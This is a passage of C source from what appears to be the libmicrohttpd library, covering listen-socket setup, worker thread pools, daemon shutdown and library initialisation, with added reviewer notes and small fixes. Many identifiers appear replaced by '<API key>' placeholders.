        MHD_DLOG (daemon,
                  "setsockopt failed: %s\n",
                  <API key> ());
#endif
      }
    }
    else if (daemon-><API key> > 0)
    {
      /* User requested to allow reusing listening address:port.
       * Use SO_REUSEADDR on Windows and SO_REUSEPORT on most platforms.
       * Fail if SO_REUSEPORT does not exist or setsockopt fails.
       */
#ifdef _WIN32
      /* SO_REUSEADDR on W32 has the same semantics
         as SO_REUSEPORT on BSD/Linux */
      if (0 > setsockopt (socket_fd,
                          SOL_SOCKET,
                          SO_REUSEADDR,
                          (const char*)&on, sizeof (on)))
      {
#if HAVE_MESSAGES
        MHD_DLOG (daemon,
                  "setsockopt failed: %s\n",
                  <API key> ());
#endif
        goto free_and_fail;
      }
#else
#ifndef SO_REUSEPORT
#ifdef LINUX
      /* Supported since Linux 3.9, but often not present (or commented out)
         in the headers at this time; but 15 is reserved for this and
         thus should be safe to use. */
#define SO_REUSEPORT 15
#endif
#endif
#ifdef SO_REUSEPORT
      if (0 > setsockopt (socket_fd,
                          SOL_SOCKET,
                          SO_REUSEPORT,
                          (void*)&on, sizeof (on)))
      {
#if HAVE_MESSAGES
        MHD_DLOG (daemon,
                  "setsockopt failed: %s\n",
                  <API key> ());
#endif
        goto free_and_fail;
      }
#else
      /* we're supposed to allow address:port re-use, but
         on this platform we cannot; fail hard */
#if HAVE_MESSAGES
      MHD_DLOG (daemon,
                "Cannot allow listening address reuse: SO_REUSEPORT not defined\n");
#endif
      goto free_and_fail;
#endif
#endif
    }
    else /* if (daemon-><API key> < 0) */
    {
      /* User requested to disallow reusing listening address:port.
       * Do nothing except for Windows where SO_EXCLUSIVEADDRUSE
       * is used. Fail if it does not exist or setsockopt fails.
       */
#ifdef _WIN32
#ifdef SO_EXCLUSIVEADDRUSE
      if (0 > setsockopt (socket_fd,
                          SOL_SOCKET,
                          SO_EXCLUSIVEADDRUSE,
                          (const char*)&on, sizeof (on)))
      {
#if HAVE_MESSAGES
        MHD_DLOG (daemon,
                  "setsockopt failed: %s\n",
                  <API key> ());
#endif
        goto free_and_fail;
      }
#else /* SO_EXCLUSIVEADDRUSE not defined on W32? */
#if HAVE_MESSAGES
      MHD_DLOG (daemon,
                "Cannot disallow listening address reuse: SO_EXCLUSIVEADDRUSE not defined\n");
#endif
      goto free_and_fail;
#endif
#endif /* _WIN32 */
    }
    /* check for user supplied sockaddr */
#if HAVE_INET6
    if (0 != (flags & MHD_USE_IPv6))
      addrlen = sizeof (struct sockaddr_in6);
    else
#endif
      addrlen = sizeof (struct sockaddr_in);
    if (NULL == servaddr)
    {
      /* No address supplied via options: bind the wildcard address. */
#if HAVE_INET6
      if (0 != (flags & MHD_USE_IPv6))
      {
        memset (&servaddr6, 0, sizeof (struct sockaddr_in6));
        servaddr6.sin6_family = AF_INET6;
        servaddr6.sin6_port = htons (port);
#if <API key>
        servaddr6.sin6_len = sizeof (struct sockaddr_in6);
#endif
        servaddr = (struct sockaddr *) &servaddr6;
      }
      else
#endif
      {
        memset (&servaddr4, 0, sizeof (struct sockaddr_in));
        servaddr4.sin_family = AF_INET;
        servaddr4.sin_port = htons (port);
#if <API key>
        servaddr4.sin_len = sizeof (struct sockaddr_in);
#endif
        servaddr = (struct sockaddr *) &servaddr4;
      }
    }
    daemon->socket_fd = socket_fd;
    if (0 != (flags & MHD_USE_IPv6))
    {
#ifdef IPPROTO_IPV6
#ifdef IPV6_V6ONLY
      /* Note: this 'on' intentionally shadows the outer constant; it is
         0 when dual-stack was requested and non-zero otherwise. */
#ifndef WINDOWS
      const int
#else
      const char
#endif
        on = (MHD_USE_DUAL_STACK != (flags & MHD_USE_DUAL_STACK));
      if (0 > setsockopt (socket_fd,
                          IPPROTO_IPV6, IPV6_V6ONLY,
                          &on, sizeof (on)))
      {
#if HAVE_MESSAGES
        MHD_DLOG (daemon,
                  "setsockopt failed: %s\n",
                  <API key> ());
#endif
      }
#endif
#endif
    }
    if (-1 == bind (socket_fd, servaddr, addrlen))
    {
#if HAVE_MESSAGES
      MHD_DLOG (daemon,
                "Failed to bind to port %u: %s\n",
                (unsigned int) port,
                <API key> ());
#endif
      if (0 != MHD_socket_close_ (socket_fd))
        MHD_PANIC ("close failed\n");
      goto free_and_fail;
    }
#ifdef TCP_FASTOPEN
    if (0 != (flags & <API key>))
    {
      if (0 == daemon->fastopen_queue_size)
        daemon->fastopen_queue_size = <API key>;
      /* Best effort: a TCP_FASTOPEN failure is only logged, not fatal. */
      if (0 != setsockopt (socket_fd,
                           IPPROTO_TCP, TCP_FASTOPEN,
                           (const char*) &daemon->fastopen_queue_size,
                           sizeof (daemon->fastopen_queue_size)))
      {
#if HAVE_MESSAGES
        MHD_DLOG (daemon,
                  "setsockopt failed: %s\n",
                  <API key> ());
#endif
      }
    }
#endif
#if EPOLL_SUPPORT
    if (0 != (flags & <API key>))
    {
      /* The listen socket must be non-blocking for the epoll loop. */
      int sk_flags = fcntl (socket_fd, F_GETFL);
      if (0 != fcntl (socket_fd, F_SETFL, sk_flags | O_NONBLOCK))
      {
#if HAVE_MESSAGES
        MHD_DLOG (daemon,
                  "Failed to make listen socket non-blocking: %s\n",
                  <API key> ());
#endif
        if (0 != MHD_socket_close_ (socket_fd))
          MHD_PANIC ("close failed\n");
        goto free_and_fail;
      }
    }
#endif
    if (listen (socket_fd, 128) < 0) // Increased to 128 from 32 by Milan Straka.
    {
#if HAVE_MESSAGES
      MHD_DLOG (daemon,
                "Failed to listen for connections: %s\n",
                <API key> ());
#endif
      if (0 != MHD_socket_close_ (socket_fd))
        MHD_PANIC ("close failed\n");
      goto free_and_fail;
    }
  }
  else
  {
    /* Listen socket was supplied via options (or no listening wanted). */
    socket_fd = daemon->socket_fd;
  }
#ifndef WINDOWS
  if ( (socket_fd >= FD_SETSIZE) &&
       (0 == (flags & (MHD_USE_POLL | <API key>)) ) )
  {
#if HAVE_MESSAGES
    MHD_DLOG (daemon,
              "Socket descriptor larger than FD_SETSIZE: %d > %d\n",
              socket_fd,
              FD_SETSIZE);
#endif
    if (0 != MHD_socket_close_ (socket_fd))
      MHD_PANIC ("close failed\n");
    goto free_and_fail;
  }
#endif
#if EPOLL_SUPPORT
  if ( (0 != (flags & <API key>)) &&
       (0 == daemon->worker_pool_size) &&
       (0 == (daemon->options & <API key>)) )
  {
    if (0 != (flags & <API key>))
    {
#if HAVE_MESSAGES
      MHD_DLOG (daemon,
                "Combining <API key> and <API key> is not supported.\n");
#endif
      goto free_and_fail;
    }
    if (MHD_YES != <API key> (daemon))
      goto free_and_fail;
  }
#else
  if (0 != (flags & <API key>))
  {
#if HAVE_MESSAGES
    MHD_DLOG (daemon,
              "epoll is not supported on this platform by this build.\n");
#endif
    goto free_and_fail;
  }
#endif
  if (MHD_YES != MHD_mutex_create_ (&daemon-><API key>))
  {
#if HAVE_MESSAGES
    MHD_DLOG (daemon,
              "MHD failed to initialize IP connection limit mutex\n");
#endif
    if ( (MHD_INVALID_SOCKET != socket_fd) &&
         (0 != MHD_socket_close_ (socket_fd)) )
      MHD_PANIC ("close failed\n");
    goto free_and_fail;
  }
  if (MHD_YES != MHD_mutex_create_ (&daemon-><API key>))
  {
#if HAVE_MESSAGES
    MHD_DLOG (daemon,
              "MHD failed to initialize IP connection limit mutex\n");
#endif
    (void) MHD_mutex_destroy_ (&daemon-><API key>);
    if ( (MHD_INVALID_SOCKET != socket_fd) &&
         (0 != MHD_socket_close_ (socket_fd)) )
      MHD_PANIC ("close failed\n");
    goto free_and_fail;
  }
#if HTTPS_SUPPORT
  /* initialize HTTPS daemon certificate aspects & send / recv functions */
  if ((0 != (flags & MHD_USE_SSL)) && (0 != MHD_TLS_init (daemon)))
  {
#if HAVE_MESSAGES
    MHD_DLOG (daemon,
              "Failed to initialize TLS support\n");
#endif
    if ( (MHD_INVALID_SOCKET != socket_fd) &&
         (0 != MHD_socket_close_ (socket_fd)) )
      MHD_PANIC ("close failed\n");
    (void) MHD_mutex_destroy_ (&daemon-><API key>);
    (void) MHD_mutex_destroy_ (&daemon-><API key>);
    goto free_and_fail;
  }
#endif
  /* Spawn the single internal select thread when requested and when no
     worker pool will be used. */
  if ( ( (0 != (flags & <API key>)) ||
         ( (0 != (flags & <API key>)) &&
           (0 == daemon->worker_pool_size)) ) &&
       (0 == (daemon->options & <API key>)) &&
       (0 != (res_thread_create =
              create_thread (&daemon->pid, daemon, &MHD_select_thread, daemon))))
  {
#if HAVE_MESSAGES
    MHD_DLOG (daemon,
              "Failed to create listen thread: %s\n",
              MHD_strerror_ (res_thread_create));
#endif
    (void) MHD_mutex_destroy_ (&daemon-><API key>);
    (void) MHD_mutex_destroy_ (&daemon-><API key>);
    if ( (MHD_INVALID_SOCKET != socket_fd) &&
         (0 != MHD_socket_close_ (socket_fd)) )
      MHD_PANIC ("close failed\n");
    goto free_and_fail;
  }
  if ( (daemon->worker_pool_size > 0) &&
       (0 == (daemon->options & <API key>)) )
  {
#if !defined(WINDOWS) || defined(CYGWIN)
    int sk_flags;
#else
    unsigned long sk_flags;
#endif
    /* Coarse-grained count of connections per thread (note error
     * due to integer division). Also keep track of how many
     * connections are leftover after an equal split. */
    unsigned int conns_per_thread = daemon->connection_limit
                                    / daemon->worker_pool_size;
    unsigned int leftover_conns = daemon->connection_limit
                                  % daemon->worker_pool_size;
    i = 0; /* we need this in case fcntl or malloc fails */
    /* Accept must be non-blocking. Multiple children may wake up
     * to handle a new connection, but only one will win the race.
     * The others must immediately return. */
#if !defined(WINDOWS) || defined(CYGWIN)
    sk_flags = fcntl (socket_fd, F_GETFL);
    if (sk_flags < 0)
      goto thread_failed;
    if (0 != fcntl (socket_fd, F_SETFL, sk_flags | O_NONBLOCK))
      goto thread_failed;
#else
    sk_flags = 1;
    if (SOCKET_ERROR == ioctlsocket (socket_fd, FIONBIO, &sk_flags))
      goto thread_failed;
#endif /* WINDOWS && !CYGWIN */
    /* Allocate memory for pooled objects */
    /* NOTE(review): no overflow check on this multiplication; confirm an
       upper bound on worker_pool_size is enforced where the option is
       parsed. */
    daemon->worker_pool = (struct MHD_Daemon*) malloc (sizeof (struct MHD_Daemon)
                                                       * daemon->worker_pool_size);
    if (NULL == daemon->worker_pool)
      goto thread_failed;
    /* Start the workers in the pool */
    for (i = 0; i < daemon->worker_pool_size; ++i)
    {
      /* Create copy of the Daemon object for each worker */
      struct MHD_Daemon *d = &daemon->worker_pool[i];

      memcpy (d, daemon, sizeof (struct MHD_Daemon));
      /* Adjust pooling params for worker daemons; note that memcpy()
         has already copied <API key> thread model into
         the worker threads. */
      d->master = daemon;
      d->worker_pool_size = 0;
      d->worker_pool = NULL;
      if ( (<API key> == (flags & <API key>)) &&
           (0 != MHD_pipe_ (d->wpipe)) )
      {
#if HAVE_MESSAGES
        MHD_DLOG (daemon,
                  "Failed to create worker control pipe: %s\n",
                  <API key>() );
#endif
        goto thread_failed;
      }
#ifndef WINDOWS
      if ( (0 == (flags & MHD_USE_POLL)) &&
           (<API key> == (flags & <API key>)) &&
           (d->wpipe[0] >= FD_SETSIZE) )
      {
#if HAVE_MESSAGES
        MHD_DLOG (daemon,
                  "file descriptor for worker control pipe exceeds maximum value\n");
#endif
        if (0 != MHD_pipe_close_ (d->wpipe[0]))
          MHD_PANIC ("close failed\n");
        if (0 != MHD_pipe_close_ (d->wpipe[1]))
          MHD_PANIC ("close failed\n");
        goto thread_failed;
      }
#endif
      /* Divide available connections evenly amongst the threads.
       * Thread indexes in [0, leftover_conns) each get one of the
       * leftover connections. */
      d->connection_limit = conns_per_thread;
      if (i < leftover_conns)
        ++d->connection_limit;
#if EPOLL_SUPPORT
      if ( (0 != (daemon->options & <API key>)) &&
           (MHD_YES != <API key> (d)) )
        goto thread_failed;
#endif
      /* Must init cleanup connection mutex for each worker */
      if (MHD_YES != MHD_mutex_create_ (&d-><API key>))
      {
#if HAVE_MESSAGES
        MHD_DLOG (daemon,
                  "MHD failed to initialize cleanup connection mutex for thread worker %d\n", i);
#endif
        goto thread_failed;
      }
      /* Spawn the worker thread */
      if (0 != (res_thread_create =
                create_thread (&d->pid, daemon, &MHD_select_thread, d)))
      {
#if HAVE_MESSAGES
        MHD_DLOG (daemon,
                  "Failed to create pool thread: %s\n",
                  MHD_strerror_ (res_thread_create));
#endif
        /* Free memory for this worker; cleanup below handles
         * all previously-created workers. */
        (void) MHD_mutex_destroy_ (&d-><API key>);
        goto thread_failed;
      }
    }
  }
  return daemon;
thread_failed:
  /* If no worker threads created, then shut down normally. Calling
     MHD_stop_daemon (as we do below) doesn't work here since it
     assumes a 0-sized thread pool means we had been in the default
     <API key> mode. */
  if (0 == i)
  {
    if ( (MHD_INVALID_SOCKET != socket_fd) &&
         (0 != MHD_socket_close_ (socket_fd)) )
      MHD_PANIC ("close failed\n");
    (void) MHD_mutex_destroy_ (&daemon-><API key>);
    (void) MHD_mutex_destroy_ (&daemon-><API key>);
    if (NULL != daemon->worker_pool)
      free (daemon->worker_pool);
    goto free_and_fail;
  }
  /* Shutdown worker threads we've already created. Pretend
     as though we had fully initialized our daemon, but
     with a smaller number of threads than had been
     requested. */
  /* NOTE(review): workers 0..i-1 started successfully, yet the pool size
     is set to i-1 so MHD_stop_daemon will never join worker i-1 --
     confirm whether this off-by-one is intended. */
  daemon->worker_pool_size = i - 1;
  MHD_stop_daemon (daemon);
  return NULL;
free_and_fail:
  /* clean up basic memory state in 'daemon' and return NULL to
     indicate failure */
#if EPOLL_SUPPORT
  if (-1 != daemon->epoll_fd)
    close (daemon->epoll_fd);
#endif
#ifdef DAUTH_SUPPORT
  free (daemon->nnc);
  (void) MHD_mutex_destroy_ (&daemon->nnc_lock);
#endif
#if HTTPS_SUPPORT
  if (0 != (flags & MHD_USE_SSL))
    <API key> (daemon->priority_cache);
#endif
  free (daemon);
  return NULL;
}
/**
 * Close the given connection, remove it from all of its
 * DLLs and move it into the cleanup queue.
 *
 * NOTE(review): manipulates the daemon's shared lists without taking a
 * lock here; confirm callers serialize access (e.g. hold the cleanup
 * mutex or run after all threads were joined).
 *
 * @param pos connection to move to cleanup
 */
static void
close_connection (struct MHD_Connection *pos)
{
  struct MHD_Daemon *daemon = pos->daemon;

  <API key> (pos,
             <API key>);
  /* A connection lives on exactly one of the two timeout lists: the
     'normal' list when it uses the daemon-wide default timeout, the
     'manual' list otherwise. */
  if (pos->connection_timeout == pos->daemon->connection_timeout)
    XDLL_remove (daemon->normal_timeout_head,
                 daemon->normal_timeout_tail,
                 pos);
  else
    XDLL_remove (daemon->manual_timeout_head,
                 daemon->manual_timeout_tail,
                 pos);
  /* Unlink from the active connection list and queue for cleanup. */
  DLL_remove (daemon->connections_head,
              daemon->connections_tail,
              pos);
  pos->event_loop_info = <API key>;
  DLL_insert (daemon->cleanup_head,
              daemon->cleanup_tail,
              pos);
}
/**
 * Close all connections for the daemon; must only be called after
 * all of the threads have been joined and there is no more concurrent
 * activity on the connection lists.
 *
 * @param daemon daemon to close down
 */
static void
<API key> (struct MHD_Daemon *daemon)
{
  struct MHD_Connection *pos;

  /* first, make sure all threads are aware of shutdown; need to
     traverse DLLs in peace... */
  if ( (0 != (daemon->options & <API key>)) &&
       (MHD_YES != MHD_mutex_lock_ (&daemon-><API key>)) )
    MHD_PANIC ("Failed to acquire cleanup mutex\n");
  /* Shut down every connection socket so blocked threads wake up; keep
     the read side open for connections that already stopped reading. */
  for (pos = daemon->connections_head; NULL != pos; pos = pos->next)
    shutdown (pos->socket_fd,
              (pos->read_closed == MHD_YES) ? SHUT_WR : SHUT_RDWR);
  if ( (0 != (daemon->options & <API key>)) &&
       (MHD_YES != MHD_mutex_unlock_ (&daemon-><API key>)) )
    MHD_PANIC ("Failed to release cleanup mutex\n");
  /* now, collect threads from thread pool */
  if (0 != (daemon->options & <API key>))
  {
    /* NOTE(review): this loop only terminates if each joined connection
       thread removed itself from 'connections_head' before exiting;
       confirm the per-connection thread does so. */
    while (NULL != (pos = daemon->connections_head))
    {
      if (0 != MHD_join_thread_ (pos->pid))
        MHD_PANIC ("Failed to join a thread\n");
      pos->thread_joined = MHD_YES;
    }
  }
  /* now that we're alone, move everyone to cleanup */
  while (NULL != (pos = daemon->connections_head))
    close_connection (pos);
  <API key> (daemon);
}
#if EPOLL_SUPPORT
/**
 * Shutdown epoll()-event loop by adding 'wpipe' to its event set.
 *
 * The write end of the pipe is (normally) immediately writable, so the
 * EPOLLOUT event fires and wakes the thread blocked in epoll_wait().
 *
 * @param daemon daemon of which the epoll() instance must be signalled
 */
static void
epoll_shutdown (struct MHD_Daemon *daemon)
{
  struct epoll_event event;

  if (MHD_INVALID_PIPE_ == daemon->wpipe[1])
  {
    /* wpipe was required in this mode, how could this happen? */
    MHD_PANIC ("Internal error\n");
  }
  event.events = EPOLLOUT;
  event.data.ptr = NULL;
  if (0 != epoll_ctl (daemon->epoll_fd,
                      EPOLL_CTL_ADD,
                      daemon->wpipe[1],
                      &event))
    MHD_PANIC ("Failed to add wpipe to epoll set to signal termination\n");
}
#endif
/**
 * Shutdown an HTTP daemon.
 *
 * Flags shutdown, wakes every worker/master thread (via control pipe,
 * socket shutdown or epoll signalling), joins the threads, tears down
 * remaining connections and finally releases all daemon resources.
 *
 * @param daemon daemon to stop (NULL is tolerated as a no-op)
 * @ingroup event
 */
void
MHD_stop_daemon (struct MHD_Daemon *daemon)
{
  MHD_socket fd;
  unsigned int i;

  if (NULL == daemon)
    return;
  /* Flag shutdown and detach the listen socket before signalling. */
  daemon->shutdown = MHD_YES;
  fd = daemon->socket_fd;
  daemon->socket_fd = MHD_INVALID_SOCKET;
  /* Prepare workers for shutdown */
  if (NULL != daemon->worker_pool)
  {
    /* <API key> disables thread pools, hence we need to check */
    for (i = 0; i < daemon->worker_pool_size; ++i)
    {
      daemon->worker_pool[i].shutdown = MHD_YES;
      daemon->worker_pool[i].socket_fd = MHD_INVALID_SOCKET;
#if EPOLL_SUPPORT
      if ( (0 != (daemon->options & <API key>)) &&
           (-1 != daemon->worker_pool[i].epoll_fd) &&
           (MHD_INVALID_SOCKET == fd) )
        epoll_shutdown (&daemon->worker_pool[i]);
#endif
    }
  }
  if (MHD_INVALID_PIPE_ != daemon->wpipe[1])
  {
    /* Wake up the master thread via the control pipe. */
    if (1 != MHD_pipe_write_ (daemon->wpipe[1], "e", 1))
      MHD_PANIC ("failed to signal shutdown via pipe");
  }
#ifdef <API key>
  else
  {
    /* fd might be MHD_INVALID_SOCKET here due to 'MHD_quiesce_daemon' */
    if (MHD_INVALID_SOCKET != fd)
      (void) shutdown (fd, SHUT_RDWR);
  }
#endif
#if EPOLL_SUPPORT
  if ( (0 != (daemon->options & <API key>)) &&
       (-1 != daemon->epoll_fd) &&
       (MHD_INVALID_SOCKET == fd) )
    epoll_shutdown (daemon);
#endif
#if DEBUG_CLOSE
#if HAVE_MESSAGES
  MHD_DLOG (daemon,
            "MHD listen socket shutdown\n");
#endif
#endif
  /* Signal workers to stop and clean them up */
  if (NULL != daemon->worker_pool)
  {
    /* <API key> disables thread pools, hence we need to check */
    for (i = 0; i < daemon->worker_pool_size; ++i)
    {
      if (MHD_INVALID_PIPE_ != daemon->worker_pool[i].wpipe[1])
      {
        if (1 != MHD_pipe_write_ (daemon->worker_pool[i].wpipe[1], "e", 1))
          MHD_PANIC ("failed to signal shutdown via pipe");
      }
      if (0 != MHD_join_thread_ (daemon->worker_pool[i].pid))
        MHD_PANIC ("Failed to join a thread\n");
      <API key> (&daemon->worker_pool[i]);
      (void) MHD_mutex_destroy_ (&daemon->worker_pool[i].<API key>);
#if EPOLL_SUPPORT
      if ( (-1 != daemon->worker_pool[i].epoll_fd) &&
           (0 != MHD_socket_close_ (daemon->worker_pool[i].epoll_fd)) )
        MHD_PANIC ("close failed\n");
#endif
      if ( (<API key> == (daemon->options & <API key>)) )
      {
        if (MHD_INVALID_PIPE_ != daemon->worker_pool[i].wpipe[1])
        {
          if (0 != MHD_pipe_close_ (daemon->worker_pool[i].wpipe[0]))
            MHD_PANIC ("close failed\n");
          if (0 != MHD_pipe_close_ (daemon->worker_pool[i].wpipe[1]))
            MHD_PANIC ("close failed\n");
        }
      }
    }
    free (daemon->worker_pool);
  }
  else
  {
    /* clean up master threads */
    if ((0 != (daemon->options & <API key>)) ||
        ((0 != (daemon->options & <API key>))
         && (0 == daemon->worker_pool_size)))
    {
      if (0 != MHD_join_thread_ (daemon->pid))
      {
        MHD_PANIC ("Failed to join a thread\n");
      }
    }
  }
  /* All threads are now stopped: tear down remaining connections,
     then the listen socket itself. */
  <API key> (daemon);
  if ( (MHD_INVALID_SOCKET != fd) &&
       (0 != MHD_socket_close_ (fd)) )
    MHD_PANIC ("close failed\n");
  /* TLS clean up */
#if HTTPS_SUPPORT
  if (MHD_YES == daemon->have_dhparams)
  {
    <API key> (daemon->https_mem_dhparams);
    daemon->have_dhparams = MHD_NO;
  }
  if (0 != (daemon->options & MHD_USE_SSL))
  {
    <API key> (daemon->priority_cache);
    if (daemon->x509_cred)
      <API key> (daemon->x509_cred);
  }
#endif
#if EPOLL_SUPPORT
  if ( (0 != (daemon->options & <API key>)) &&
       (-1 != daemon->epoll_fd) &&
       (0 != MHD_socket_close_ (daemon->epoll_fd)) )
    MHD_PANIC ("close failed\n");
#endif
#ifdef DAUTH_SUPPORT
  free (daemon->nnc);
  (void) MHD_mutex_destroy_ (&daemon->nnc_lock);
#endif
  (void) MHD_mutex_destroy_ (&daemon-><API key>);
  (void) MHD_mutex_destroy_ (&daemon-><API key>);
  if (MHD_INVALID_PIPE_ != daemon->wpipe[1])
  {
    if (0 != MHD_pipe_close_ (daemon->wpipe[0]))
      MHD_PANIC ("close failed\n");
    if (0 != MHD_pipe_close_ (daemon->wpipe[1]))
      MHD_PANIC ("close failed\n");
  }
  free (daemon);
}
/**
 * Obtain information about the given daemon
 * (not fully implemented!).
 *
 * @param daemon what daemon to get information about
 * @param info_type what information is desired?
 * @param ... depends on @a info_type
 * @return NULL if this information is not available
 *         (or if the @a info_type is unknown)
 * @ingroup specialized
 */
const union MHD_DaemonInfo *
MHD_get_daemon_info (struct MHD_Daemon *daemon,
                     enum MHD_DaemonInfoType info_type,
                     ...)
{
  /* Fix: the declared parameter list ended with a dangling comma; the
     '...' variadic terminator (documented above as "@param ...") was
     missing, which is a syntax error. The varargs are accepted for API
     compatibility but not consumed by any current info_type. */
  switch (info_type)
  {
  case <API key>:
    return NULL; /* no longer supported */
  case <API key>:
    return NULL; /* no longer supported */
  case <API key>:
    /* Expose the listen socket by pointer into the daemon struct. */
    return (const union MHD_DaemonInfo *) &daemon->socket_fd;
#if EPOLL_SUPPORT
  case <API key>:
    return (const union MHD_DaemonInfo *) &daemon->epoll_fd;
#endif
  case <API key>:
    <API key> (daemon);
    if (daemon->worker_pool)
    {
      /* Collect the connection information stored in the workers. */
      unsigned int i;

      daemon->connections = 0;
      for (i=0;i<daemon->worker_pool_size;i++)
      {
        <API key> (&daemon->worker_pool[i]);
        daemon->connections += daemon->worker_pool[i].connections;
      }
    }
    return (const union MHD_DaemonInfo *) &daemon->connections;
  default:
    return NULL;
  }
}
/**
 * Replace the global handler invoked on fatal internal errors. @a cb
 * will only be called in the case of typically fatal, serious
 * internal consistency issues (e.g. severe memory corruption). While
 * @a cb is allowed to return and MHD will then try to continue, doing
 * so is never safe.
 *
 * The default implementation (installed when no panic function was
 * set) prints an error message and calls `abort()`; alternatives
 * might call `exit()` or similar.
 *
 * @param cb new error handler
 * @param cls passed to @a cb
 * @ingroup logging
 */
void
MHD_set_panic_func (MHD_PanicCallback cb, void *cls)
{
  /* Store the closure argument first, then install the callback. */
  mhd_panic_cls = cls;
  mhd_panic = cb;
}
/**
 * Obtain the version of this library
 *
 * @return static version string, e.g. "0.9.9"
 * @ingroup specialized
 */
const char *
MHD_get_version (void)
{
#ifdef PACKAGE_VERSION
  return PACKAGE_VERSION;
#else  /* !PACKAGE_VERSION */
  /* Lazily render MHD_VERSION (packed 0xMMmmpp.. value, printed with %x)
     into a static buffer on first call.
     NOTE(review): this lazy init is not thread-safe; two threads racing
     here could write 'ver' concurrently -- confirm callers. */
  static char ver[12] = "\0\0\0\0\0\0\0\0\0\0\0";
  if (0 == ver[0])
  {
    int res = MHD_snprintf_(ver, sizeof(ver), "%x.%x.%x",
                            (((int)MHD_VERSION >> 24) & 0xFF),
                            (((int)MHD_VERSION >> 16) & 0xFF),
                            (((int)MHD_VERSION >> 8) & 0xFF));
    if (0 >= res || sizeof(ver) <= res)
      return "0.0.0"; /* Can't return real version*/
  }
  return ver;
#endif /* !PACKAGE_VERSION */
}
/**
 * Get information about supported MHD features.
 * Indicate that MHD was compiled with or without support for
 * particular feature. Some features require additional support
 * by kernel. Kernel support is not checked by this function.
 *
 * @param feature type of requested information
 * @return #MHD_YES if feature is supported by MHD, #MHD_NO if
 * feature is not supported or feature is unknown.
 * @ingroup specialized
 */
_MHD_EXTERN int
<API key>(enum MHD_FEATURE feature)
{
  /* Each branch simply reflects the corresponding compile-time switch;
     nothing here probes the running kernel. */
  switch(feature)
  {
  /* NOTE(review): "MESSGES" spelling matches the public enum in the
     header; do not "correct" it locally. */
  case MHD_FEATURE_MESSGES:
#if HAVE_MESSAGES
    return MHD_YES;
#else
    return MHD_NO;
#endif
  case MHD_FEATURE_SSL:
#if HTTPS_SUPPORT
    return MHD_YES;
#else
    return MHD_NO;
#endif
  case <API key>:
#if HTTPS_SUPPORT && <API key> >= 3
    return MHD_YES;
#else
    return MHD_NO;
#endif
  case MHD_FEATURE_IPv6:
#ifdef HAVE_INET6
    return MHD_YES;
#else
    return MHD_NO;
#endif
  case <API key>:
#if defined(IPPROTO_IPV6) && defined(IPV6_V6ONLY)
    return MHD_YES;
#else
    return MHD_NO;
#endif
  case MHD_FEATURE_POLL:
#ifdef HAVE_POLL_H
    return MHD_YES;
#else
    return MHD_NO;
#endif
  case MHD_FEATURE_EPOLL:
#if EPOLL_SUPPORT
    return MHD_YES;
#else
    return MHD_NO;
#endif
  case <API key>:
#ifdef <API key>
    return MHD_YES;
#else
    return MHD_NO;
#endif
  case <API key>:
#ifdef MHD_DONT_USE_PIPES
    return MHD_YES;
#else
    return MHD_NO;
#endif
  case <API key>:
#ifdef TCP_FASTOPEN
    return MHD_YES;
#else
    return MHD_NO;
#endif
  case <API key>:
#if BAUTH_SUPPORT
    return MHD_YES;
#else
    return MHD_NO;
#endif
  case <API key>:
#if DAUTH_SUPPORT
    return MHD_YES;
#else
    return MHD_NO;
#endif
  case <API key>:
#if HAVE_POSTPROCESSOR
    return MHD_YES;
#else
    return MHD_NO;
#endif
  }
  /* Unknown (possibly newer) feature values are reported unsupported. */
  return MHD_NO;
}
#if HTTPS_SUPPORT && <API key> < 0x010600
/* Pre-1.6.0 libgcrypt requires the application to supply thread
   callbacks; provide pthread- or W32-mutex based implementations. */
#if defined(<API key>)
<API key>;
#elif defined(MHD_W32_MUTEX_)
/* Allocate and initialize a mutex for libgcrypt; returns errno-style codes. */
static int gcry_w32_mutex_init (void **ppmtx)
{
  *ppmtx = malloc (sizeof (MHD_mutex_));
  if (NULL == *ppmtx)
    return ENOMEM;
  if (MHD_YES != MHD_mutex_create_ ((MHD_mutex_*)*ppmtx))
  {
    free (*ppmtx);
    *ppmtx = NULL;
    return EPERM;
  }
  return 0;
}
/* Destroy and free a libgcrypt mutex; 0 on success. */
static int <API key> (void **ppmtx)
{ int res = (MHD_YES == MHD_mutex_destroy_ ((MHD_mutex_*)*ppmtx)) ? 0 : 1;
  free (*ppmtx); return res; }
/* Lock a libgcrypt mutex; 0 on success. */
static int gcry_w32_mutex_lock (void **ppmtx)
{ return (MHD_YES == MHD_mutex_lock_ ((MHD_mutex_*)*ppmtx)) ? 0 : 1; }
/* Unlock a libgcrypt mutex; 0 on success. */
static int <API key> (void **ppmtx)
{ return (MHD_YES == MHD_mutex_unlock_ ((MHD_mutex_*)*ppmtx)) ? 0 : 1; }
/* Thread-callback table handed to gcry_control() in MHD_init(). */
static struct gcry_thread_cbs gcry_threads_w32 = {
  (<API key> | (<API key> << 8)),
  NULL, gcry_w32_mutex_init, <API key>,
  gcry_w32_mutex_lock, <API key>,
  NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL };
#endif // defined(MHD_W32_MUTEX_)
#endif // HTTPS_SUPPORT && <API key> < 0x010600
/**
 * Global library initialization: install the default panic handler and
 * perform one-time setup of winsock (on W32) and the TLS library.
 */
void MHD_init(void)
{
  mhd_panic = &mhd_panic_std;
  mhd_panic_cls = NULL;
#ifdef _WIN32
  WSADATA wsd;
  if (0 != WSAStartup(MAKEWORD(2, 2), &wsd))
    MHD_PANIC ("Failed to initialize winsock\n");
  mhd_winsock_inited_ = 1;
  /* Fix: WSAStartup may negotiate a version LOWER than the requested
     2.2, so reject unless BOTH bytes of wVersion are 2. The previous
     '&&' only panicked when both bytes differed, silently accepting
     e.g. version 2.0. */
  if (2 != LOBYTE(wsd.wVersion) || 2 != HIBYTE(wsd.wVersion))
    MHD_PANIC ("Winsock version 2.2 is not available\n");
#endif
#if HTTPS_SUPPORT
#if <API key> < 0x010600
  /* Old libgcrypt: register thread callbacks before any other use. */
#if defined(<API key>)
  if (0 != gcry_control (<API key>, &<API key>))
    MHD_PANIC ("Failed to initialise multithreading in libgcrypt\n");
#elif defined(MHD_W32_MUTEX_)
  if (0 != gcry_control (<API key>, &gcry_threads_w32))
    MHD_PANIC ("Failed to initialise multithreading in libgcrypt\n");
#endif // defined(MHD_W32_MUTEX_)
  gcry_check_version (NULL);
#else
  /* libgcrypt >= 1.6.0 is thread-safe by itself; just verify version. */
  if (NULL == gcry_check_version ("1.6.0"))
    MHD_PANIC ("libgcrypt is too old. MHD was compiled for libgcrypt 1.6.0 or newer\n");
#endif
  gnutls_global_init ();
#endif
}
/**
